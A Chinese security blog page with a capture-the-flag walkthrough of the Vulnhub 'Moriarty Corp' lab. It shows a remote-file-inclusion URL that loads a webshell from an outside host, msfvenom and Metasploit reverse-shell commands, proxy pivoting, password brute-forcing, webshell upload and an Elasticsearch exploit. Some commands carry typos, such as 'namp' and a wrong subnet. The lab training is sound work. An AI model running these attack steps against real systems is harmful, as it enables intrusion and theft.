<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <title>Moriarty Corp | BetaSecLab</title>
  <meta name="keywords" content=" 靶场攻略 ">
  <meta name="description" content="Moriarty Corp | BetaSecLab">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="description" content="qq群：   639882908  公众号：BetaSecLab  注：此博客会持续更新，更新方向为web安全、内网渗透、应急响应、云安全、企业安全架构，如有发现帖子中存在问题和不足请随时和我沟通； CTF在线靶场：XCTF 实训平台: http:&#x2F;&#x2F;oj.xctf.org.cn安恒周周练： https:&#x2F;&#x2F;www.linkedbyx.com&#x2F;home南京邮电大学CTF&#x2F;网络攻防训练平台: htt">
<meta property="og:type" content="website">
<meta property="og:title" content="博客简介">
<meta property="og:url" content="http://yoursite.com/about/index.html">
<meta property="og:site_name" content="BetaSecLab">
<meta property="og:description" content="qq群：   639882908  公众号：BetaSecLab  注：此博客会持续更新，更新方向为web安全、内网渗透、应急响应、云安全、企业安全架构，如有发现帖子中存在问题和不足请随时和我沟通； CTF在线靶场：XCTF 实训平台: http:&#x2F;&#x2F;oj.xctf.org.cn安恒周周练： https:&#x2F;&#x2F;www.linkedbyx.com&#x2F;home南京邮电大学CTF&#x2F;网络攻防训练平台: htt">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://blog.betaseclab.com/img/weixin.jpg">
<meta property="article:published_time" content="2020-04-20T04:51:20.000Z">
<meta property="article:modified_time" content="2020-04-23T05:10:47.010Z">
<meta property="article:author" content="一坨奔跑的蜗牛">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://blog.betaseclab.com/img/weixin.jpg">


<link rel="icon" href="/img/blog.jpg">

<link href="/css/style.css?v=1.0.1" rel="stylesheet">

<link href="/css/hl_theme/github.css?v=1.0.1" rel="stylesheet">

<link href="//cdn.bootcss.com/animate.css/3.5.2/animate.min.css" rel="stylesheet">
<link href="//cdn.bootcss.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet">

<script src="//cdn.bootcss.com/jquery/2.2.4/jquery.min.js"></script>
<script src="/js/jquery.autocomplete.min.js?v=1.0.1" ></script>

<script src="//cdn.bootcss.com/highlight.js/9.12.0/highlight.min.js"></script>
<script>
    hljs.initHighlightingOnLoad();
</script>

<script src="//cdn.bootcss.com/nprogress/0.2.0/nprogress.min.js"></script>



<script src="//cdn.bootcss.com/jquery-cookie/1.4.1/jquery.cookie.min.js" ></script>

<script src="/js/iconfont.js?v=1.0.1" ></script>

<meta name="generator" content="Hexo 4.2.0"></head>
<div style="display: none">
  <input class="theme_disqus_on" value="false">
  <input class="theme_preload_comment" value="false">
  <input class="theme_blog_path" value="">
</div>

<body>
<aside class="nav">
    <div class="nav-left">
        <a href="/" class="avatar_target">
    <img class="avatar" src="/img/blog.jpg" />
</a>
<div class="author">
    <span>一坨奔跑的蜗牛</span>
</div>

<div class="icon">
    
        
        <a title="github" href="https://github.com/a-running-snail2333" target="_blank">
            
                <svg class="iconfont-svg" aria-hidden="true">
                    <use xlink:href="#icon-github"></use>
                </svg>
            
        </a>
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
        <a title="email" href="mailto:2072622989@qq.com" target="_blank">
            
                <svg class="iconfont-svg" aria-hidden="true">
                    <use xlink:href="#icon-email"></use>
                </svg>
            
        </a>
        
    
        
        <a title="qq" href="http://wpa.qq.com/msgrd?v=3&uin=2072622989&site=qq&menu=yes" target="_blank">
            
                <svg class="iconfont-svg" aria-hidden="true">
                    <use xlink:href="#icon-qq"></use>
                </svg>
            
        </a>
        
    
        
    
</div>




<ul>
    <li><div class="all active">全部文章<small>(9)</small></div></li>
    
        
            
            <li><div data-rel="靶场攻略">靶场攻略<small>(2)</small></div>
                
            </li>
            
        
    
        
            
            <li><div data-rel="工具安装">工具安装<small>(1)</small></div>
                
            </li>
            
        
    
        
            
            <li><div data-rel="web渗透">web渗透<small>(3)</small></div>
                
            </li>
            
        
    
        
            
            <li><div data-rel="内网渗透">内网渗透<small>(3)</small></div>
                
            </li>
            
        
    
</ul>
<div class="left-bottom">
    <div class="menus">
    
    </div>
    <div><a class="about  hasFriend  " target="_self"  href="http://blog.betaseclab.com/about">关于</a><a style="width: 50%"  class="friends">友链</a></div>
</div>
<input type="hidden" id="yelog_site_posts_number" value="9">

<div style="display: none">
    <span id="busuanzi_value_site_uv"></span>
    <span id="busuanzi_value_site_pv"></span>
</div>

    </div>
    <div class="nav-right">
        <div class="friends-area">
    <div class="friends-title">
        友情链接
        <i class="back-title-list"></i>
    </div>
    <div class="friends-content">
        <ul>
            
            <li><a target="_blank" href="http://yelog.org/">叶落阁</a></li>
            
            <li><a target="_blank" href="https://adsecurity.org/">AD安全博客</a></li>
            
            <li><a target="_blank" href="http://www.fuzzysecurity.com">FuzzySecurity博客</a></li>
            
            <li><a target="_blank" href="https://xz.aliyun.com/">先知社区</a></li>
            
            <li><a target="_blank" href="https://evi1cg.me/">Evi1cg博客</a></li>
            
            <li><a target="_blank" href="http://b404.xyz/">Jirairya博客</a></li>
            
            <li><a target="_blank" href="https://payloads.online/">倾旋博客</a></li>
            
            <li><a target="_blank" href="https://times0ng.github.io/">Times0g博客</a></li>
            
            <li><a target="_blank" href="http://byd.dropsec.xyz/">瓦都剋</a></li>
            
            <li><a target="_blank" href="http://cate4cafe.com/">cate4cafe</a></li>
            
            <li><a target="_blank" href="https://www.peerlyst.com/posts/the-powershell-wiki-chiheb-chebbi">powershell wiki</a></li>
            
            <li><a target="_blank" href="https://blog.netwrix.com/">netwrix博客</a></li>
            
            <li><a target="_blank" href="https://3gstudent.github.io/3gstudent.github.io/">三好学生博客</a></li>
            
            <li><a target="_blank" href="https://www.cnblogs.com/klionsec/">klion新博客</a></li>
            
            <li><a target="_blank" href="https://klionsec.github.io/">klion旧博客</a></li>
            
            <li><a target="_blank" href="https://jivoi.github.io/archive/">EK博客</a></li>
            
            <li><a target="_blank" href="http://securityer.lofter.com/view">走过岁月博客</a></li>
            
            <li><a target="_blank" href="http://www.webbaozi.com/">baozi博客</a></li>
            
            <li><a target="_blank" href="http://www.myh0st.cn/">信安之路</a></li>
            
            <li><a target="_blank" href="http://jdrops.dropsec.xyz/">Jdrops博客</a></li>
            
            <li><a target="_blank" href="https://exploit.kitploit.com/">exploit collector</a></li>
            
            <li><a target="_blank" href="http://zjw.dropsec.xyz/">Hello_C博客</a></li>
            
            <li><a target="_blank" href="https://cxsecurity.com/dorks">cxsecurity</a></li>
            
            <li><a target="_blank" href="https://pentest.blog/">pentest</a></li>
            
            <li><a target="_blank" href="https://rcoil.me/">rcoil</a></li>
            
            <li><a target="_blank" href="https://dayu.ink/">Dayu</a></li>
            
            <li><a target="_blank" href="https://04z.net/">04z</a></li>
            
            <li><a target="_blank" href="https://www.attackdebris.com/">attsckdebris</a></li>
            
            <li><a target="_blank" href="https://wooyun.js.org/">原乌</a></li>
            
            <li><a target="_blank" href="https://www.corelan.be/">corelan team</a></li>
            
            <li><a target="_blank" href="https://landgrey.me/">landgrey</a></li>
            
        </ul>
    </div>
</div>
        <div class="title-list">
    <form onkeydown="if(event.keyCode === 13){return false;}">
        <input id="local-search-input" class="search" type="text" placeholder="Search..." />
        <i class="cross"></i>
        <span>
            <label for="tagswitch">Tags:</label>
            <input id="tagswitch" type="checkbox" style="display: none" />
            <i id="tagsWitchIcon"></i>
        </span>
    </form>
    <div class="tags-list">
    
    <li class="article-tag-list-item">
        <a class="color5">靶场攻略</a>
    </li>
    
    <li class="article-tag-list-item">
        <a class="color5">工具安装</a>
    </li>
    
    <li class="article-tag-list-item">
        <a class="color1">web渗透</a>
    </li>
    
    <li class="article-tag-list-item">
        <a class="color5">内网渗透</a>
    </li>
    
    <div class="clearfix"></div>
</div>

    
    <nav id="title-list-nav">
        
        <a  class="靶场攻略 "
           href="/2020/04/19/labs-DC_6/"
           data-tag="靶场攻略"
           data-author="" >
            <span class="post-title" title="Vulnhub_DC6">Vulnhub_DC6</span>
            <span class="post-date" title="2020-04-19 22:22:38">2020/04/19</span>
        </a>
        
        <a  class="工具安装 "
           href="/2019/07/02/kali%20%E9%85%8D%E7%BD%AE%E4%B8%8E%E7%BE%8E%E5%8C%96/"
           data-tag="工具安装"
           data-author="" >
            <span class="post-title" title="kali系统配置">kali系统配置</span>
            <span class="post-date" title="2019-07-02 00:00:00">2019/07/02</span>
        </a>
        
        <a  class="靶场攻略 "
           href="/2020/06/07/labs-Moriarty%20Corp/"
           data-tag="靶场攻略"
           data-author="" >
            <span class="post-title" title="Moriarty Corp">Moriarty Corp</span>
            <span class="post-date" title="2020-06-07 14:14:20">2020/06/07</span>
        </a>
        
        <a  class="web渗透 "
           href="/2019/04/01/web%E5%AE%89%E5%85%A8-xxe/"
           data-tag="web渗透"
           data-author="" >
            <span class="post-title" title="外部实体注入">外部实体注入</span>
            <span class="post-date" title="2019-04-01 00:00:00">2019/04/01</span>
        </a>
        
        <a  class="web渗透 "
           href="/2019/03/09/web%E5%AE%89%E5%85%A8-%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E/"
           data-tag="web渗透"
           data-author="" >
            <span class="post-title" title="文件上传漏洞">文件上传漏洞</span>
            <span class="post-date" title="2019-03-09 00:00:00">2019/03/09</span>
        </a>
        
        <a  class="web渗透 "
           href="/2019/04/08/web%E5%AE%89%E5%85%A8-%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/"
           data-tag="web渗透"
           data-author="" >
            <span class="post-title" title="文件包含漏洞">文件包含漏洞</span>
            <span class="post-date" title="2019-04-08 00:00:00">2019/04/08</span>
        </a>
        
        <a  class="内网渗透 "
           href="/2019/04/10/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F-%E6%8F%90%E6%9D%83%E7%AF%87/"
           data-tag="内网渗透"
           data-author="" >
            <span class="post-title" title="windows提权">windows提权</span>
            <span class="post-date" title="2019-04-10 08:12:20">2019/04/10</span>
        </a>
        
        <a  class="内网渗透 "
           href="/2019/03/07/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F-%E5%9F%9F%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA/"
           data-tag="内网渗透"
           data-author="" >
            <span class="post-title" title="域环境搭建">域环境搭建</span>
            <span class="post-date" title="2019-03-07 10:12:20">2019/03/07</span>
        </a>
        
        <a  class="内网渗透 "
           href="/2020/04/27/%E7%AB%AF%E5%8F%A3%E5%8F%8A%E6%BC%8F%E6%B4%9E/"
           data-tag="内网渗透"
           data-author="" >
            <span class="post-title" title="端口及漏洞">端口及漏洞</span>
            <span class="post-date" title="2020-04-27 20:17:41">2020/04/27</span>
        </a>
        
    </nav>
</div>
    </div>
    <div class="hide-list">
        <div class="semicircle">
            <div class="brackets first"><</div>
            <div class="brackets">&gt;</div>
        </div>
    </div>
</aside>
<div class="post">
    <div class="pjax">
        <article id="post-labs-Moriarty Corp" class="article article-type-post" itemscope itemprop="blogPost">
    
        <h1 class="article-title">Moriarty Corp</h1>
    
    <div class="article-meta">
        
        
        
        <span class="book">
            
                <a  data-rel="靶场攻略">靶场攻略</a>
            
        </span>
        
        
        <span class="tag">
            
            <a class="color5">靶场攻略</a>
            
        </span>
        
    </div>
    <div class="article-meta">
        
        创建时间:<time class="date" title='更新时间: 2020-06-07 14:14:20'>2020-06-07 14:14</time>
        
    </div>
    <div class="article-meta">
        
        
        <span id="busuanzi_container_page_pv">
            阅读:<span id="busuanzi_value_page_pv">
                <span class="count-comment">
                    <span class="spinner">
                      <div class="cube1"></div>
                      <div class="cube2"></div>
                    </span>
                </span>
            </span>
        </span>
        
        
    </div>
    
    <div class="toc-ref">
    
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#1-靶场环境"><span class="toc-text">1. 靶场环境</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2-主机发现"><span class="toc-text">2. 主机发现</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#3-文件包含"><span class="toc-text">3. 文件包含</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#4-Payload反弹"><span class="toc-text">4. Payload反弹</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#5-添加代理"><span class="toc-text">5. 添加代理</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#7-暴力破解"><span class="toc-text">7. 暴力破解</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#8-文件上传"><span class="toc-text">8. 文件上传</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#9-SSH弱口令"><span class="toc-text">9. SSH弱口令</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#10-任意用户密码修改"><span class="toc-text">10. 任意用户密码修改</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#11-远程代码执行"><span class="toc-text">11. 远程代码执行</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#12-个人总结"><span class="toc-text">12. 个人总结</span></a></li></ol>
    
<style>
    .left-col .switch-btn,
    .left-col .switch-area {
        display: none;
    }
    .toc-level-3 i,
    .toc-level-3 ol {
        display: none !important;
    }
</style>
</div>
    
    <div class="article-entry" itemprop="articleBody">
      
        <p>Moriarty Corp 靶场环境包含一台外网服务器和三台内网主机，攻击者需先对外网服务器进行web攻击，依据提交flag后的提示信息，逐步获取内网主机权限。本次靶场环境包含以下10个关键部分：</p>
<pre><code class="javascript">1. 靶场环境                7. 暴力破解
2. 主机发现                8. 文件上传
3. 文件包含                9. SSH弱口令
4. payload反弹           10. 任意用户密码修改
5. 添加代理               11. 远程代码执行
6. 内网探测               12. 个人总结</code></pre>
<h2 id="1-靶场环境"><a href="#1-靶场环境" class="headerlink" title="1. 靶场环境"></a>1. 靶场环境</h2><p>本次所使用的攻击机为kali linux系统，攻击过程中涉及到的工具主要有：公网主机VPS，中国菜刀/中国蚂剑，burpsuite，metasploit，MobaXterm，一句话木马，proxychains，nmap，searchsploit，exp脚本等。攻击的拓扑结构如下图所示。</p>
<p><img src="http://blog.betaseclab.com/picture/Moriarty_Corp/1.png" alt=""></p>
<p><strong>注意:</strong><br>外网服务器(8000端口)为提交<code>flag</code>以及攻击提示处，并不存在漏洞，请不要进行攻击行为。<code>flag</code>的存储格式为<code>#_flag.txt</code>，通常存储在服务器的不同目录下面。每次提交<code>flag</code>后都会给相关提示和说明。开始渗透之前须向外网服务器(8000端口)提交<code>flag{start}</code>，表示攻击开始正常启动。本次实验的虚拟机采用<code>virtual box</code>.<br>详细靶场说明请参考：<br><a href="https://www.vulnhub.com/entry/boredhackerblog-moriarty-corp,456/" target="_blank" rel="noopener">https://www.vulnhub.com/entry/boredhackerblog-moriarty-corp,456/</a><br>靶场下载地址：<br>Download (Mirror):<br><a href="https://download.vulnhub.com/boredhackerblog/MoriartyCorp.ova" target="_blank" rel="noopener">https://download.vulnhub.com/boredhackerblog/MoriartyCorp.ova</a><br>Download (Torrent):<br><a href="https://download.vulnhub.com/boredhackerblog/MoriartyCorp.ova.torrent" target="_blank" rel="noopener">https://download.vulnhub.com/boredhackerblog/MoriartyCorp.ova.torrent</a></p>
<h2 id="2-主机发现"><a href="#2-主机发现" class="headerlink" title="2. 主机发现"></a>2. 主机发现</h2><p>通过arp(地址解析协议)进行局域网内主机发现，arp是根据IP地址获取物理地址的一个TCP/IP协议。主机发送信息时将包含目标IP地址的ARP请求广播到网络上的所有主机，并接收返回消息，以此确定目标的物理地址；收到返回消息后将该IP地址和物理地址存入本机ARP缓存中并保留一定时间。</p>
<pre><code class="lsl">&gt;&gt;&gt; namp -sn -PR -T 4 192.168.124.0/24
-sn：只进行主机发现，不进行端口扫描。
-PR：ARP Ping。
-T：指定扫描过程使用的时序，总有6个级别（0-5），级别越高，扫描速度越快，在网络通讯状况较好的情况下推荐使用T4。</code></pre>
<h2 id="3-文件包含"><a href="#3-文件包含" class="headerlink" title="3. 文件包含"></a>3. 文件包含</h2><p>通过访问页面形式为 <code>http://192.168.124.14/file=name.html</code>，可猜测为目录遍历或者文件包含漏洞，如下为漏洞验证结果。</p>
<p>文件包含漏洞，通常分为本地文件包含和远程文件包含。本地文件包含，通常需要能够写入webshell的文件进行包含，进而获取shell权限。远程文件包含，可对远程写入webshell的文件进行包含，获取shell权限。如下为远程服务器test.txt文件写入phpinfo();</p>
<p>访问页面对远程主机的test.txt文件进行包含，验证远程文件漏洞真实存在。这样可以在远程服务器写入webshell进行包含，进而获取Moriarty Corp服务器的主机shell权限。</p>
<p>如下所示，通过菜刀直接连接后，可以获取到shell权限。通过查看目录,在根目录查看到1_flag.txt。<br>木马文件链接地址：<code>http://192.168.124.14/?file=http://xx.xx.xx.xx/snail.txt</code></p>
<p>将获取到的flag内容进行提交后，Moriarty Corp靶场给出新的提示。如下图所示，提示内网环境中存在重要的网站，里面存在要获取的flag信息，并且告知内网范围在172.17.0.3-254段。由此，开始步入后渗透攻击阶段，由于靶场环境主要以linux系统环境为主，故此处后渗透工具在此处选择metasploit工具为主。</p>
<h2 id="4-Payload反弹"><a href="#4-Payload反弹" class="headerlink" title="4. Payload反弹"></a>4. Payload反弹</h2><p>攻击机进行监听设置(注意：监听主机设置需要与生成的payload保持一致)：</p>
<pre><code class="shell">&gt;&gt;&gt; use exploit/multi/handler
&gt;&gt;&gt; set payloads linux/x64/meterpreter_reverse_tcp
&gt;&gt;&gt; set LHOST 192.168.124.15        #监听主机ip地址
&gt;&gt;&gt; set PORT 9999                  #监听主机端口号
&gt;&gt;&gt; exploit -j</code></pre>
<p>生成反弹需要的payload文件：</p>
<pre><code class="shell">&gt;&gt;&gt; msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=IP LPORT =PORT -f elf &gt; shell.elf</code></pre>
<p>将生成的文件上传到目标主机，并更改payload可执行权限，并执行。</p>
<pre><code class="dockerfile">&gt;&gt;&gt; chmod 777 shell.elf
&gt;&gt;&gt; ./shell.elf</code></pre>
<p>在攻击端，监听的主机收到目标主机反弹的shell权限，如下图所示：</p>
<h2 id="5-添加代理"><a href="#5-添加代理" class="headerlink" title="5. 添加代理"></a>5. 添加代理</h2><p>根据提交flag后系统反馈的提示说明，需要我们对内网的web应用网站进行渗透攻击，此时为了能够访问到内网，需要进行添加代理操作。查看当前路由有一个内网段ip地址段位172.17.0.0/24。</p>
<p>执行指令添加路由操作。</p>
<pre><code class="lsl">&gt;&gt;&gt; run autoroute -s 172.17.0.0/24</code></pre>
<p>添加socks5代理：</p>
<pre><code class="ruby">&gt;&gt;&gt; use auxiliary/server/socks5
&gt;&gt;&gt; run</code></pre>
<p>此处应用proxychains工具，进行内网探测，使用编辑器在文件/etc/proxychains.conf的最后一行加入socks5代理的配置信息。<br>— snippet —<br>[ProxyList]</p>
<pre><code class="shell"># add proxy here ...
# meanwile
# defaults set to &quot;tor&quot;
socks5  127.0.0.1 1080</code></pre>
<ol start="6">
<li>内网探测<br>通过执行代理工具proxychains，对Moriarty Corp内网web服务进行探测，可以发现主机ip地址为172.17.0.4。执行指令如下所示：</li>
</ol>
<pre><code class="lsl">&gt;&gt;&gt; Proxychains nmap 172.17.0.0/24 -sV  -sT  -Pn  -T 4 -p80 </code></pre>
<h2 id="7-暴力破解"><a href="#7-暴力破解" class="headerlink" title="7. 暴力破解"></a>7. 暴力破解</h2><p>此时通过浏览器是不能访问到内网服务器，需要在浏览器配置代理进行访问，配置代理类型选择socks5，本地端口为1080。配置好以后，就能通过代理访问内网web应用了。</p>
<p>通过浏览页面可发现，为一个文件上传页面，但是上传需要输入口令，方可操作成功。此时考虑可通过burpsuite进行拦截后，口令破解。</p>
<p>打开burpsuite后，需要添加代理，这样才能将拦截到的数据正确发送到目标服务器，配置过程如下所示：</p>
<p>对拦截的数据更改口令字段，添加常用字典，此处用的字典为：top1000.txt。查看破解成功字段的真实口令为password。</p>
<h2 id="8-文件上传"><a href="#8-文件上传" class="headerlink" title="8. 文件上传"></a>8. 文件上传</h2><p>如下图所示，成功将木马上传至服务器：</p>
<p>常用的菜刀，Cknife等工具并不存在代理功能，此处使用中国蚁剑工具进行连接，配置蚁剑代理如下所示：</p>
<p>成功连接到内网的shell后，访问目标系统不同目录，获取第二个flag文件：2_flag.txt</p>
<h2 id="9-SSH弱口令"><a href="#9-SSH弱口令" class="headerlink" title="9. SSH弱口令"></a>9. SSH弱口令</h2><p>将获取到的flag内容进行提交后，Moriarty Corp靶场给出新的提示。如下图所示，给出几个用户名和密码hash值。对内网中的ssh服务进行弱口令猜解。</p>
<p>通过第三方网站，对给出的hash值进行破解，如下所示为破解的hash结果：</p>
<p>对内网的22端口进行探测，发现主机172.17.0.8开放22端口，并对该内网主机进行ssh弱口令猜解。</p>
<pre><code class="lsl">&gt;&gt;&gt; proxychains nmap -sV -t -Pn -p22 127.17.0.0/24</code></pre>
<p>通过第三方工具MobaXterm添加代理后，远程连接到内网主机，具体操作过程如下所示：</p>
<p>猜解成功后，获得当前内网主机的基本权限，访问目录后的3_flag.txt。查看并进行提交。</p>
<h2 id="10-任意用户密码修改"><a href="#10-任意用户密码修改" class="headerlink" title="10. 任意用户密码修改"></a>10. 任意用户密码修改</h2><p>将获取到的flag内容进行提交后，Moriarty Corp靶场给出新的提示。如下图所示，提示说存在一个聊天网站，管理员的聊天记录可能存在有价值的信息。并给出服务器开放端口可能在443，8000，8080，8888。</p>
<p>对内网的443，8000，8080，8888端口进行探测，发现主机172.17.0.9开放8000端口，并对该内网主机web应用进行访问。</p>
<pre><code class="lsl">&gt;&gt;&gt; proxychains nmap -sV -t -Pn -p443,8000,8080,8888 127.17.0.0/24</code></pre>
<p>根据提示给出的用户名和口令进行登陆，查看网站具有两个功能，可以查看chats聊天记录，可以更改用户名密码。尝试抓包，通过更改用户名为管理员，设置口令。此时如果存在任意用户名口令更改漏洞，此时就可以把管理员登陆密码从新设置。</p>
<p>更改后，便可以以管理员身份进行登陆了。通过访问chats可以查看到另外一个flag信息。</p>
<p>将获取到的flag内容进行提交后，Moriarty Corp靶场给出新的提示。如下图所示，文中提到一个web应用Elasticsearch。尝试百度查询了一下，该服务默认运行在9200端口，并存在框架漏洞。</p>
<h2 id="11-远程代码执行"><a href="#11-远程代码执行" class="headerlink" title="11. 远程代码执行"></a>11. 远程代码执行</h2><p>对内网的9200端口进行探测，发现主机172.17.0.10开放9200端口，并对该内网主机web应用进行访问。</p>
<pre><code class="lsl">&gt;&gt;&gt; proxychains nmap -sV  -sT  -Pn  -p9200 127.17.0.0/24</code></pre>
<p>依据kali自带功能searchsploit功能进行版本漏洞搜索：</p>
<pre><code class="ruby">&gt;&gt;&gt; searchsploit elasticsearch</code></pre>
<p>使用36337.py脚本执行远程代码执行攻击，获取shell权限</p>
<p>通过查看目标主机目录，获取flag信息6_flag.txt。</p>
<h2 id="12-个人总结"><a href="#12-个人总结" class="headerlink" title="12. 个人总结"></a>12. 个人总结</h2><p>Moriarty Corp靶场涉及到了web攻击到内网漫游的基本环节，在每一个相关环节作者都给予了提示，漏洞利用方式较为简单。提交完漏洞结束后，就像服务器提示所说被拉入黑名单了，再次访问发现已被拉黑。</p>

      
       <hr><span style="font-style: italic;color: gray;"> 转载请注明来源，欢迎对文章中的引用来源进行考证，欢迎指出任何有错误或不够清晰的表达。 </span>
    </div>
</article>


<p>
    <a  class="dashang" onclick="dashangToggle()">赏</a>
</p>






    




    </div>
    <div class="copyright">
        <p class="footer-entry">©2020 snail</p>
<p class="footer-entry">Built with <a href="https://hexo.io/" target="_blank">Hexo</a> and <a href="https://github.com/yelog/hexo-theme-3-hexo" target="_blank">3-hexo</a> theme</p>

    </div>
    <div class="full-toc">
        <button class="full"><span class="min "></span></button>
<button class="post-toc-menu"><span class="post-toc-menu-icons"></span></button>
<div class="post-toc"><span class="post-toc-title">目录</span>
    <div class="post-toc-content">

    </div>
</div>
<a class="" id="rocket" ></a>

    </div>
</div>
<div class="acParent"></div>

<div class="hide_box" onclick="dashangToggle()"></div>
<div class="shang_box">
    <a class="shang_close"  onclick="dashangToggle()">×</a>
    <div class="shang_tit">
        <p>喜欢就点赞,疼爱就打赏</p>
    </div>
    <div class="shang_payimg">
        <div class="pay_img">
            <img src="/img/alipay.jpg" class="alipay" title="扫码支持">
            <img src="/img/weixin.jpg" class="weixin" title="扫码支持">
        </div>
    </div>
    <div class="shang_payselect">
        <span><label><input type="radio" name="pay" checked value="alipay">支付宝</label></span><span><label><input type="radio" name="pay" value="weixin">微信</label></span>
    </div>
</div>


</body>
<script src="/js/jquery.pjax.js?v=1.0.1" ></script>

<script src="/js/script.js?v=1.0.1" ></script>
<script>
    var img_resize = 'default';
    /*作者、标签的自动补全*/
    $(function () {
        $('.search').AutoComplete({
            'data': ['#靶场攻略','#工具安装','#web渗透','#内网渗透',],
            'itemHeight': 20,
            'width': 418
        }).AutoComplete('show');
    })
    function initArticle() {
        /*渲染对应的表格样式*/
        
            $(".post .pjax table").addClass("green_title");
        

        /*渲染打赏样式*/
        
        $("input[name=pay]").on("click", function () {
            if($("input[name=pay]:checked").val()=="weixin"){
                $(".shang_box .shang_payimg .pay_img").addClass("weixin_img");
            } else {
                $(".shang_box .shang_payimg .pay_img").removeClass("weixin_img");
            }
        })
        

        /*高亮代码块行号*/
        
        $('pre code').each(function(){
            var lines = $(this).text().trim().split('\n').length, widther='';
            if (lines>99) {
                widther = 'widther'
            }
            var $numbering = $('<ul/>').addClass('pre-numbering ' + widther).attr("unselectable","on");
            $(this).addClass('has-numbering ' + widther)
                    .parent()
                    .append($numbering);
            for(var i=1;i<=lines;i++){
                $numbering.append($('<li/>').text(i));
            }
        });
        

        /*访问数量*/
        
        $.getScript("//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js");
        

        /*代码高亮，行号对齐*/
        $('.pre-numbering').css('line-height',$('.has-numbering').css('line-height'));

        
        
    }

    /*打赏页面隐藏与展示*/
    
    function dashangToggle() {
        $(".shang_box").fadeToggle();
        $(".hide_box").fadeToggle();
    }
    

</script>

<!--加入行号的高亮代码块样式-->

<style>
    pre{
        position: relative;
        margin-bottom: 24px;
        border-radius: 10px;
        border: 1px solid #e2dede;
        background: #FFF;
        overflow: hidden;
    }
    code.has-numbering{
        margin-left: 30px;
    }
    code.has-numbering.widther{
        margin-left: 35px;
    }
    .pre-numbering{
        margin: 0px;
        position: absolute;
        top: 0;
        left: 0;
        width: 20px;
        padding: 0.5em 3px 0.7em 5px;
        border-right: 1px solid #C3CCD0;
        text-align: right;
        color: #AAA;
        background-color: ;
    }
    .pre-numbering.widther {
        width: 35px;
    }
</style>

<!--自定义样式设置-->
<style>
    
    
    .nav {
        width: 552px;
    }
    .nav.fullscreen {
        margin-left: -552px;
    }
    .nav-left {
        width: 130px;
    }
    
    
    @media screen and (max-width: 1468px) {
        .nav {
            width: 502px;
        }
        .nav.fullscreen {
            margin-left: -502px;
        }
        .nav-left {
            width: 110px;
        }
    }
    
    
    @media screen and (max-width: 1024px) {
        .nav {
            width: 502px;
            margin-left: -502px
        }
        .nav.fullscreen {
            margin-left: 0;
        }
        .nav .hide-list.fullscreen {
            left: 502px
        }
    }
    
    @media screen and (max-width: 426px) {
        .nav {
            width: 100%;
        }
        .nav-left {
            width: 100%;
        }
    }
    
    
    .nav-right .title-list nav a .post-title, .nav-right .title-list #local-search-result a .post-title {
        color: #383636;
    }
    
    
    .nav-right .title-list nav a .post-date, .nav-right .title-list #local-search-result a .post-date {
        color: #5e5e5f;
    }
    
    
    .nav-right nav a.hover, #local-search-result a.hover{
        background-color: #c1bfc1;
    }
    
    
    .nav-right nav a.hover > span{
        color: #ffffff !important;
    }
    

    /*列表样式*/
    
    .post .pjax article .article-entry>ol, .post .pjax article .article-entry>ul, .post .pjax article>ol, .post .pjax article>ul{
        border: #e2dede solid 1px;
        border-radius: 10px;
        padding: 10px 32px 10px 56px;
    }
    .post .pjax article .article-entry li>ol, .post .pjax article .article-entry li>ul,.post .pjax article li>ol, .post .pjax article li>ul{
        padding-top: 5px;
        padding-bottom: 5px;
    }
    .post .pjax article .article-entry>ol>li, .post .pjax article .article-entry>ul>li,.post .pjax article>ol>li, .post .pjax article>ul>li{
        margin-bottom: auto;
        margin-left: auto;
    }
    .post .pjax article .article-entry li>ol>li, .post .pjax article .article-entry li>ul>li,.post .pjax article li>ol>li, .post .pjax article li>ul>li{
        margin-bottom: auto;
        margin-left: auto;
    }
    

    /* 背景图样式 */
    
    


    /*引用块样式*/
    

    /*文章列表背景图*/
    
    .nav-right:before {
        content: ' ';
        display: block;
        position: absolute;
        left: 0;
        top: 0;
        width: 100%;
        height: 100%;
        opacity: 0.3;
        background: url("");
        background-repeat: no-repeat;
        background-position: 50% 0;
        -ms-background-size: cover;
        -o-background-size: cover;
        -moz-background-size: cover;
        -webkit-background-size: cover;
        background-size: cover;
    }
    

    
</style>







</html>
